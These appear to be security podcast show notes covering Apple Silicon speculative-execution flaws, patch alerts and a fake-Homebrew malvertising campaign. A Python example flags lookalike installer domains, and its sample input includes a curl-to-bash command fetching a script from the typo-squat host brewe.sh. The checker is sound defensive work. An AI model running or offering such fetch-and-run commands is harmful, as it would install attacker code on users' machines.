Feedback & Followups
- Updated Advice from Bart: back in 2019 I recommended the anti-malware not-for-profit DNS provider QuadNine (9.9.9.9) on the NosillaCast, and I had been using it on my router since then, but not anymore. Their service has been degrading, and it got so bad this week that I switched to CloudFlare’s 1.1.1.1. If you are using QuadNine and have been having unexpectedly slow internet, consider following suit!
Deep Dive — New Speculative Execution Attacks against Apple Silicon (SLAP & FLOP)
TL;DR: for now the real-world risk appears to be low, and there is nothing users can do at the moment. Apple are monitoring the situation, so urgent patches may be forthcoming in the future.
Since the infamous Spectre and Meltdown vulnerabilities first brought the concept of speculative execution to our attention at the start of 2018, we’ve seen a parade of these kinds of CPU optimisations that can lead to inadvertent data leaks. Most of these bugs have affected Intel CPUs, but there have been some affecting AMD and Apple processors too.
The majority of these vulnerabilities are only a real threat in shared hosting environments, where it’s normal for unrelated processes to share a CPU, and where any cross-process leaks are a really big deal. This has resulted in cloud providers being forced to implement fixes and workarounds that generally result in substantial performance losses per-CPU. For home users the performance trade-offs are generally not worth it because only our stuff should be running on our devices. These bugs hence usually fall into the “if you have malware on your machine …” category.
But, a small subset of these bugs have required urgent patches for everyone, usually provided through OS and/or browser updates because they could be exploited via JavaScript, so just visiting a website could leak sensitive data from your device.
That’s unfortunately the category a pair of newly detailed Apple-specific vulnerabilities fall into.
Security researchers have now publicly disclosed a pair of speculative execution bugs affecting newer Apple Silicon chips which they’ve named SLAP and FLOP. SLAP abuses the Load Address Predictor (LAP), which guesses the address the next load instruction will read from, and is present from the M2 and A15 onwards; FLOP abuses the Load Value Predictor (LVP), which guesses the value a load will return before the data has actually arrived, and is present from the M3 and A17 onwards. In both cases the CPU runs ahead on a wrong guess, and the side effects of that speculative work can be measured to recover data the code was never allowed to read.
To illustrate the danger the researchers demonstrated the flaws from within a browser, with a malicious web page successfully extracting secret information from other open tabs in about 10 minutes.
The flaws were responsibly disclosed to Apple last summer, but as yet there are no patches. Apple have said they are monitoring the situation and have observed no real-world attacks. We can only assume that if real-world attacks emerge Apple will act.
For now, we regular folks just need to sit and wait, knowing we may need to patch urgently sometime in the future.
For high-risk users there is one more concrete suggested action: enable Lockdown Mode, which massively hardens the OS in general and Safari in particular (among other things it disables Safari’s just-in-time JavaScript compiler, so expect some websites to break: this hardening comes at the cost of functionality!)
Links
- Two Apple Silicon chip flaws could expose your private data to thieves — appleinsider.com/…
- Apple chips can be hacked to leak secrets from Gmail, iCloud, and more — arstechnica.com/…
- Apple chips can leak secrets to hackers; SLAP and FLOP attacks explained — www.intego.com/…
Action Alerts
- iOS 18.3 and macOS Sequoia 15.3 patch first Apple zero-day of 2025 — www.intego.com/…
- Attention Git users: a nasty collection of Git bugs was first found in the GitHub Desktop app. While most of them are specific to that one app, which has now been patched, related flaws were found in core Git and may affect other clients. If your Git app offers you an update, take it! — thehackernews.com/… & www.bleepingcomputer.com/…
- Attention QNAP NAS owners: QNAP fixes six Rsync vulnerabilities in NAS backup, recovery app — www.bleepingcomputer.com/…
Worthy Warnings
- Yet another Malvertising attack, this time targeting a very popular app within our community: Fake Homebrew Google ads target Mac users with malware — www.bleepingcomputer.com/…
- The ad was very convincing and seemed to point to the correct brew.sh domain, but clicking that ad took users to a perfect clone of the site at brewe.sh (notice the extra e!). This site gave users instructions for installing a malicious version of Homebrew.
- Hat-tip to Allister in the Podfeet Slack for spotting this story first
- Editorial by Bart: in my opinion ad-based search is now so broken that it’s just not safe to use anymore. I’ll do a full review on the NosillaCast later in the year, but I now recommend paying for search so as to get 100% ad-free high-quality search. My second annual Kagi renewal came through just this week, so I’ve been living in this world for two years, and I’m now confident saying it’s better than current Google.
- Beware, attackers seem to be exploiting the fact that websites often make us do weird things to prove we’re human:
- A timely illustration of the dangers of using cloud-hosted LLMs: DeepSeek exposes database with over 1 million chat records — www.bleepingcomputer.com/…
- Prompts often give away a lot of information, so be careful what you ask which LLM!
- Apple Intelligence is a notable exception here: unless you explicitly ask it to use ChatGPT, your prompts are handled on-device or by Apple’s Private Cloud Compute, which is designed so that not even Apple can read them.
- US parents and students should probably contact their schools to understand whether or not this affects them, and if so, how, because the specific impact varies widely between schools: PowerSchool starts notifying victims of massive data breach — www.bleepingcomputer.com/…
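The lookalike-domain trick in the Homebrew story above (brewe.sh standing in for brew.sh) is easy to miss by eye, so here is an added example, written for these notes rather than taken from Homebrew or any of the linked articles, of the check worth running before pasting an installer one-liner: pull the URLs out of the command, compare each host against an allowlist, and flag any host that is only a couple of edits away from a trusted one. The allowlist, the edit-distance threshold and the sample commands are assumptions made for this example.

```python
"""Flag installer URLs whose host is a near-miss of a trusted domain.

Added example for these show notes (not Homebrew's code): before running a
"curl ... | bash" style one-liner, extract the URLs it fetches, check each host
against an allowlist, and flag hosts that are only a few edits away from a
trusted one, such as brewe.sh standing in for brew.sh.
"""
import re
from urllib.parse import urlsplit

# Assumed allowlist for this example: the hosts we expect install scripts from.
TRUSTED_HOSTS = {"brew.sh", "raw.githubusercontent.com"}

# Assumed threshold: hosts within this many edits of a trusted host are flagged.
MAX_DISTANCE = 2

# Matches http(s) URLs inside a shell command, stopping at quotes and pipes.
URL_RE = re.compile(r"https?://[^\s'\")|;]+")


def levenshtein(a: str, b: str) -> int:
    """Edit distance between a and b (insertions, deletions, substitutions)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # delete ca
                           cur[j - 1] + 1,             # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def host_of(url: str) -> str:
    """Lower-cased host name of a URL with any leading 'www.' removed."""
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def classify_host(host: str, trusted=TRUSTED_HOSTS,
                  max_distance: int = MAX_DISTANCE) -> str:
    """Return 'trusted', 'lookalike:<trusted host>' or 'unknown' for a host."""
    if host in trusted:
        return "trusted"
    for good in sorted(trusted):
        # brewe.sh is one insertion away from brew.sh, so it is flagged here.
        if levenshtein(host, good) <= max_distance:
            return f"lookalike:{good}"
    return "unknown"


def check_install_command(cmd: str) -> dict:
    """Map every URL fetched by a shell one-liner to its classification."""
    return {url: classify_host(host_of(url)) for url in URL_RE.findall(cmd)}


if __name__ == "__main__":
    # Constructed sample commands: the shape of the Homebrew installer
    # one-liner, and a hypothetical lookalike of the kind the ad pointed at.
    genuine = ('/bin/bash -c "$(curl -fsSL '
               'https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"')
    lookalike = '/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"'
    for cmd in (genuine, lookalike):
        for url, verdict in check_install_command(cmd).items():
            print(f"{verdict:<20} {url}")
```

This only catches typo-squats within a couple of edits of a trusted name; a subdomain trick such as brew.sh.attacker.example, a homoglyph domain, or a malicious script on a path you trust all come back as "unknown" or "trusted", so the check is a tripwire, not a substitute for downloading the script to a file and reading it before running it.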
Notable News
- A timely reminder that the NSO Group and their infamous Pegasus spyware are just the most infamous of a whole class of companies and apps: Meta Confirms Zero-Click WhatsApp Spyware Attack Targeting 90 Journalists, Activists — thehackernews.com/…
- Further evidence of why we can’t trust cellular networks anymore: RANsacked: Over 100 Security Flaws Found in LTE and 5G Network Implementations — thehackernews.com/…
- The most eye-opening example of the dangers of trusting devices made in adversarial nations I’ve seen in some time: Backdoor found in two healthcare patient monitors, linked to IP in China — www.bleepingcomputer.com/… (US hospitals are being asked to disconnect these devices from their networks)
- The US TikTok ban came into effect on the 19th of January (one day before President Trump’s inauguration) — www.macobserver.com/…
- On the day, TikTok’s service went offline in the US because their US cloud providers Akamai & Oracle obeyed the new law. Apple & Google also removed the app from their app stores.
- On his first day in office, President Trump issued an executive order instructing the Department of Justice (DOJ) not to enforce the law for 75 days.
- The law remained in effect and in place — Executive Orders can’t override duly passed and signed laws (only Congress can repeal them, and courts can rule them unconstitutional)
- Akamai & Oracle chose to accept this no-prosecution promise, so service resumed in the US
- Apple & Google chose to continue to obey the law, keeping the app out of their stores
- Legal Analysis: Trump’s TikTok Executive Order and the Limits of Executive Non-Enforcement — www.lawfaremedia.org/…
- Non-prosecution promises have no legal standing
- The normal statute of limitations applies — any administration in the next 5 years could choose to prosecute Akamai & Oracle
- The start of the second Trump Presidency has had some notable detrimental effects on cybersecurity
- A good overview of everything that happened in the new administration’s first week: A Tumultuous Week for Federal Cybersecurity Efforts — krebsonsecurity.com/…
- President Trump Pardons Silk Road Creator Ross Ulbricht After 11 Years in Prison — thehackernews.com/… (this news was swamped in all the other pardon news)
- Trump Terminates DHS Advisory Committee Memberships, Disrupting Cybersecurity Review — thehackernews.com/…
- Some good news from the EFF: VICTORY! Federal Court (Finally) Rules Backdoor Searches of 702 Data Unconstitutional — www.eff.org/…
- PayPal to pay $2 million settlement over 2022 data breach — www.bleepingcomputer.com/…
- An interesting detail is the reason for the settlement — not the fact that there was a breach, but that PayPal had failed to implement adequate security practices and adequate staff cybersecurity training (they have made improvements since)
- GDPR complaints filed against TikTok, Temu for sending user data to China — www.bleepingcomputer.com/…
- Some nice security enhancements
- New Android Identity Check locks settings outside trusted locations — www.bleepingcomputer.com/…
- Google launches customizable Web Store for Enterprise extensions — www.bleepingcomputer.com/… (a powerful new tool for enterprise customers)
- Related: another illustration of the dangers browser plugins pose, and the renewed focus they are getting from attackers and researchers alike: New Syncjacking attack hijacks devices using Chrome extensions — www.bleepingcomputer.com/…
- Bitwarden makes it harder to hack password vaults without MFA — www.bleepingcomputer.com/… (accounts without MFA now have to confirm a code sent by email each time they log in from a new device)
- Two nice uses of AI by Microsoft:
- Microsoft tests Edge Scareware Blocker to block tech support scams — www.bleepingcomputer.com/…
- Microsoft Teams phishing attack alerts coming to everyone next month — www.bleepingcomputer.com/…
- A nice reminder that in a cat-and-mouse game the cat scores a lot of wins too: Google blocked 2.36 million risky Android apps from Play Store in 2024 — www.bleepingcomputer.com/…
- A good reminder that playing around with hacking tools is dangerous: Hacker infects 18,000 “script kiddies” with fake malware builder — www.bleepingcomputer.com/…
Top Tips
Excellent advice from Ken Ray: Checklist 408 – Family Passwords and Smishing, Revisited — overcast.fm/…
- Editorial by Bart: I wholeheartedly agree it’s time for family passwords again; the deepfake threat is no longer hypothetical, it’s very real now, with many victims each day
Palate Cleansers
- From Bart:
- A fascinating look at a researcher’s work on sabotaging AIs that hoover up artists’ work without permission: Freakonomics Radio 619: How to Poison the A.I. Machine — overcast.fm/… (I remain convinced this is fair use, but I empathise with all sides, recommending because it’s an interesting conversation, not because I have a strong opinion one way or the other)
- From Allison:
- Some truly excellent data visualisation work: Almost one in 10 people use the same four-digit PIN — www.abc.net.au/… (based on Have-I-Been-Pwned data, and given an enthusiastic endorsement by HIBP creator Troy Hunt)
Legend
When the textual description of a link is part of the link it is the title of the page being linked to, when the text describing a link is not part of the link it is a description written by Bart.
Emoji | Meaning
---|---
 | A link to audio content, probably a podcast.
 | A call to action.
flag | The story is particularly relevant to people living in a specific country, or, the organisation the story is about is affiliated with the government of a specific country.
 | A link to graphical content, probably a chart, graph, or diagram.
 | A story that has been over-hyped in the media, or, “no need to light your hair on fire”.
 | A link to an article behind a paywall.
 | A pinned story, i.e. one to keep an eye on that’s likely to develop into something significant in the future.
 | A tip of the hat to thank a member of the community for bringing the story to our attention.
 | A link to video content.
You went to CloudFlare’s 1.1.1.1 service — I would have thought you’d have gone to 1.1.1.3 or 1.1.1.2 for the malware protection…?
Good point @Ferrers — will do a quick follow up next time.